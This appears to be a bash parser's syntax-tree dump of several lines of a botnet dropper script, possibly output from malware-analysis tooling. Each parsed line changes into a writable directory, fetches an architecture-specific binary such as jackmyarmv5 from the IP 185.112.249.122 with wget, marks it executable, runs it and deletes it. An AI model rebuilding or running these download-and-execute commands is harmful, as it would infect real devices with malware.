ListNode(lineno=15, pos=(2039, 2193), parts=[
  CommandNode(lineno=15, pos=(2039, 2046), parts=[
    WordNode(lineno=15, pos=(2039, 2041), word='cd'),
    WordNode(lineno=15, pos=(2042, 2046), word='/tmp'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(2047, 2049)),
  CommandNode(lineno=15, pos=(2050, 2064), parts=[
    WordNode(lineno=15, pos=(2050, 2052), word='cd'),
    WordNode(lineno=15, pos=(2053, 2064), word='/var/system'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(2065, 2067)),
  CommandNode(lineno=15, pos=(2068, 2075), parts=[
    WordNode(lineno=15, pos=(2068, 2070), word='cd'),
    WordNode(lineno=15, pos=(2071, 2075), word='/mnt'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(2076, 2078)),
  CommandNode(lineno=15, pos=(2079, 2087), parts=[
    WordNode(lineno=15, pos=(2079, 2081), word='cd'),
    WordNode(lineno=15, pos=(2082, 2087), word='/root'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(2088, 2090)),
  CommandNode(lineno=15, pos=(2091, 2095), parts=[
    WordNode(lineno=15, pos=(2091, 2093), word='cd'),
    WordNode(lineno=15, pos=(2094, 2095), word='/'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(2095, 2096)),
  CommandNode(lineno=15, pos=(2097, 2136), parts=[
    WordNode(lineno=15, pos=(2097, 2101), word='wget'),
    WordNode(lineno=15, pos=(2102, 2136), word='http://185.112.249.122/jackmysparc'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(2136, 2137)),
  CommandNode(lineno=15, pos=(2138, 2158), parts=[
    WordNode(lineno=15, pos=(2138, 2143), word='chmod'),
    WordNode(lineno=15, pos=(2144, 2146), word='+x'),
    WordNode(lineno=15, pos=(2147, 2158), word='jackmysparc'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(2158, 2159)),
  CommandNode(lineno=15, pos=(2160, 2173), parts=[
    WordNode(lineno=15, pos=(2160, 2173), word='./jackmysparc'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(2173, 2174)),
  CommandNode(lineno=15, pos=(2175, 2193), parts=[
    WordNode(lineno=15, pos=(2175, 2177), word='rm'),
    WordNode(lineno=15, pos=(2178, 2181), word='-rf'),
    WordNode(lineno=15, pos=(2182, 2193), word='jackmysparc'),
  ]),
])
ListNode(lineno=16, pos=(2194, 2348), parts=[
  CommandNode(lineno=16, pos=(2194, 2201), parts=[
    WordNode(lineno=16, pos=(2194, 2196), word='cd'),
    WordNode(lineno=16, pos=(2197, 2201), word='/tmp'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(2202, 2204)),
  CommandNode(lineno=16, pos=(2205, 2219), parts=[
    WordNode(lineno=16, pos=(2205, 2207), word='cd'),
    WordNode(lineno=16, pos=(2208, 2219), word='/var/system'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(2220, 2222)),
  CommandNode(lineno=16, pos=(2223, 2230), parts=[
    WordNode(lineno=16, pos=(2223, 2225), word='cd'),
    WordNode(lineno=16, pos=(2226, 2230), word='/mnt'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(2231, 2233)),
  CommandNode(lineno=16, pos=(2234, 2242), parts=[
    WordNode(lineno=16, pos=(2234, 2236), word='cd'),
    WordNode(lineno=16, pos=(2237, 2242), word='/root'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(2243, 2245)),
  CommandNode(lineno=16, pos=(2246, 2250), parts=[
    WordNode(lineno=16, pos=(2246, 2248), word='cd'),
    WordNode(lineno=16, pos=(2249, 2250), word='/'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(2250, 2251)),
  CommandNode(lineno=16, pos=(2252, 2291), parts=[
    WordNode(lineno=16, pos=(2252, 2256), word='wget'),
    WordNode(lineno=16, pos=(2257, 2291), word='http://185.112.249.122/jackmyarmv4'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(2291, 2292)),
  CommandNode(lineno=16, pos=(2293, 2313), parts=[
    WordNode(lineno=16, pos=(2293, 2298), word='chmod'),
    WordNode(lineno=16, pos=(2299, 2301), word='+x'),
    WordNode(lineno=16, pos=(2302, 2313), word='jackmyarmv4'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(2313, 2314)),
  CommandNode(lineno=16, pos=(2315, 2328), parts=[
    WordNode(lineno=16, pos=(2315, 2328), word='./jackmyarmv4'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(2328, 2329)),
  CommandNode(lineno=16, pos=(2330, 2348), parts=[
    WordNode(lineno=16, pos=(2330, 2332), word='rm'),
    WordNode(lineno=16, pos=(2333, 2336), word='-rf'),
    WordNode(lineno=16, pos=(2337, 2348), word='jackmyarmv4'),
  ]),
])
ListNode(lineno=17, pos=(2349, 2511), parts=[
  CommandNode(lineno=17, pos=(2349, 2356), parts=[
    WordNode(lineno=17, pos=(2349, 2351), word='cd'),
    WordNode(lineno=17, pos=(2352, 2356), word='/tmp'),
  ]),
  OperatorNode(lineno=17, op='||', pos=(2357, 2359)),
  CommandNode(lineno=17, pos=(2360, 2374), parts=[
    WordNode(lineno=17, pos=(2360, 2362), word='cd'),
    WordNode(lineno=17, pos=(2363, 2374), word='/var/system'),
  ]),
  OperatorNode(lineno=17, op='||', pos=(2375, 2377)),
  CommandNode(lineno=17, pos=(2378, 2385), parts=[
    WordNode(lineno=17, pos=(2378, 2380), word='cd'),
    WordNode(lineno=17, pos=(2381, 2385), word='/mnt'),
  ]),
  OperatorNode(lineno=17, op='||', pos=(2386, 2388)),
  CommandNode(lineno=17, pos=(2389, 2397), parts=[
    WordNode(lineno=17, pos=(2389, 2391), word='cd'),
    WordNode(lineno=17, pos=(2392, 2397), word='/root'),
  ]),
  OperatorNode(lineno=17, op='||', pos=(2398, 2400)),
  CommandNode(lineno=17, pos=(2401, 2405), parts=[
    WordNode(lineno=17, pos=(2401, 2403), word='cd'),
    WordNode(lineno=17, pos=(2404, 2405), word='/'),
  ]),
  OperatorNode(lineno=17, op=';', pos=(2405, 2406)),
  CommandNode(lineno=17, pos=(2407, 2448), parts=[
    WordNode(lineno=17, pos=(2407, 2411), word='wget'),
    WordNode(lineno=17, pos=(2412, 2448), word='http://185.112.249.122/jackmyarmv4tl'),
  ]),
  OperatorNode(lineno=17, op=';', pos=(2448, 2449)),
  CommandNode(lineno=17, pos=(2450, 2472), parts=[
    WordNode(lineno=17, pos=(2450, 2455), word='chmod'),
    WordNode(lineno=17, pos=(2456, 2458), word='+x'),
    WordNode(lineno=17, pos=(2459, 2472), word='jackmyarmv4tl'),
  ]),
  OperatorNode(lineno=17, op=';', pos=(2472, 2473)),
  CommandNode(lineno=17, pos=(2474, 2489), parts=[
    WordNode(lineno=17, pos=(2474, 2489), word='./jackmyarmv4tl'),
  ]),
  OperatorNode(lineno=17, op=';', pos=(2489, 2490)),
  CommandNode(lineno=17, pos=(2491, 2511), parts=[
    WordNode(lineno=17, pos=(2491, 2493), word='rm'),
    WordNode(lineno=17, pos=(2494, 2497), word='-rf'),
    WordNode(lineno=17, pos=(2498, 2511), word='jackmyarmv4tl'),
  ]),
])
ListNode(lineno=18, pos=(2512, 2666), parts=[
  CommandNode(lineno=18, pos=(2512, 2519), parts=[
    WordNode(lineno=18, pos=(2512, 2514), word='cd'),
    WordNode(lineno=18, pos=(2515, 2519), word='/tmp'),
  ]),
  OperatorNode(lineno=18, op='||', pos=(2520, 2522)),
  CommandNode(lineno=18, pos=(2523, 2537), parts=[
    WordNode(lineno=18, pos=(2523, 2525), word='cd'),
    WordNode(lineno=18, pos=(2526, 2537), word='/var/system'),
  ]),
  OperatorNode(lineno=18, op='||', pos=(2538, 2540)),
  CommandNode(lineno=18, pos=(2541, 2548), parts=[
    WordNode(lineno=18, pos=(2541, 2543), word='cd'),
    WordNode(lineno=18, pos=(2544, 2548), word='/mnt'),
  ]),
  OperatorNode(lineno=18, op='||', pos=(2549, 2551)),
  CommandNode(lineno=18, pos=(2552, 2560), parts=[
    WordNode(lineno=18, pos=(2552, 2554), word='cd'),
    WordNode(lineno=18, pos=(2555, 2560), word='/root'),
  ]),
  OperatorNode(lineno=18, op='||', pos=(2561, 2563)),
  CommandNode(lineno=18, pos=(2564, 2568), parts=[
    WordNode(lineno=18, pos=(2564, 2566), word='cd'),
    WordNode(lineno=18, pos=(2567, 2568), word='/'),
  ]),
  OperatorNode(lineno=18, op=';', pos=(2568, 2569)),
  CommandNode(lineno=18, pos=(2570, 2609), parts=[
    WordNode(lineno=18, pos=(2570, 2574), word='wget'),
    WordNode(lineno=18, pos=(2575, 2609), word='http://185.112.249.122/jackmyarmv5'),
  ]),
  OperatorNode(lineno=18, op=';', pos=(2609, 2610)),
  CommandNode(lineno=18, pos=(2611, 2631), parts=[
    WordNode(lineno=18, pos=(2611, 2616), word='chmod'),
    WordNode(lineno=18, pos=(2617, 2619), word='+x'),
    WordNode(lineno=18, pos=(2620, 2631), word='jackmyarmv5'),
  ]),
  OperatorNode(lineno=18, op=';', pos=(2631, 2632)),
  CommandNode(lineno=18, pos=(2633, 2646), parts=[
    WordNode(lineno=18, pos=(2633, 2646), word='./jackmyarmv5'),
  ]),
  OperatorNode(lineno=18, op=';', pos=(2646, 2647)),
  CommandNode(lineno=18, pos=(2648, 2666), parts=[
    WordNode(lineno=18, pos=(2648, 2650), word='rm'),
    WordNode(lineno=18, pos=(2651, 2654), word='-rf'),
    WordNode(lineno=18, pos=(2655, 2666), word='jackmyarmv5'),
  ]),
])
ListNode(lineno=19, pos=(2667, 2821), parts=[
  CommandNode(lineno=19, pos=(2667, 2674), parts=[
    WordNode(lineno=19, pos=(2667, 2669), word='cd'),
    WordNode(lineno=19, pos=(2670, 2674), word='/tmp'),
  ]),
  OperatorNode(lineno=19, op='||', pos=(2675, 2677)),
  CommandNode(lineno=19, pos=(2678, 2692), parts=[
    WordNode(lineno=19, pos=(2678, 2680), word='cd'),
    WordNode(lineno=19, pos=(2681, 2692), word='/var/system'),
  ]),
  OperatorNode(lineno=19, op='||', pos=(2693, 2695)),
  CommandNode(lineno=19, pos=(2696, 2703), parts=[
    WordNode(lineno=19, pos=(2696, 2698), word='cd'),
    WordNode(lineno=19, pos=(2699, 2703), word='/mnt'),
  ]),
  OperatorNode(lineno=19, op='||', pos=(2704, 2706)),
  CommandNode(lineno=19, pos=(2707, 2715), parts=[
    WordNode(lineno=19, pos=(2707, 2709), word='cd'),
    WordNode(lineno=19, pos=(2710, 2715), word='/root'),
  ]),
  OperatorNode(lineno=19, op='||', pos=(2716, 2718)),
  CommandNode(lineno=19, pos=(2719, 2723), parts=[
    WordNode(lineno=19, pos=(2719, 2721), word='cd'),
    WordNode(lineno=19, pos=(2722, 2723), word='/'),
  ]),
  OperatorNode(lineno=19, op=';', pos=(2723, 2724)),
  CommandNode(lineno=19, pos=(2725, 2764), parts=[
    WordNode(lineno=19, pos=(2725, 2729), word='wget'),
    WordNode(lineno=19, pos=(2730, 2764), word='http://185.112.249.122/jackmyarmv6'),
  ]),
  OperatorNode(lineno=19, op=';', pos=(2764, 2765)),
  CommandNode(lineno=19, pos=(2766, 2786), parts=[
    WordNode(lineno=19, pos=(2766, 2771), word='chmod'),
    WordNode(lineno=19, pos=(2772, 2774), word='+x'),
    WordNode(lineno=19, pos=(2775, 2786), word='jackmyarmv6'),
  ]),
  OperatorNode(lineno=19, op=';', pos=(2786, 2787)),
  CommandNode(lineno=19, pos=(2788, 2801), parts=[
    WordNode(lineno=19, pos=(2788, 2801), word='./jackmyarmv6'),
  ]),
  OperatorNode(lineno=19, op=';', pos=(2801, 2802)),
  CommandNode(lineno=19, pos=(2803, 2821), parts=[
    WordNode(lineno=19, pos=(2803, 2805), word='rm'),
    WordNode(lineno=19, pos=(2806, 2809), word='-rf'),
    WordNode(lineno=19, pos=(2810, 2821), word='jackmyarmv6'),
  ]),
])
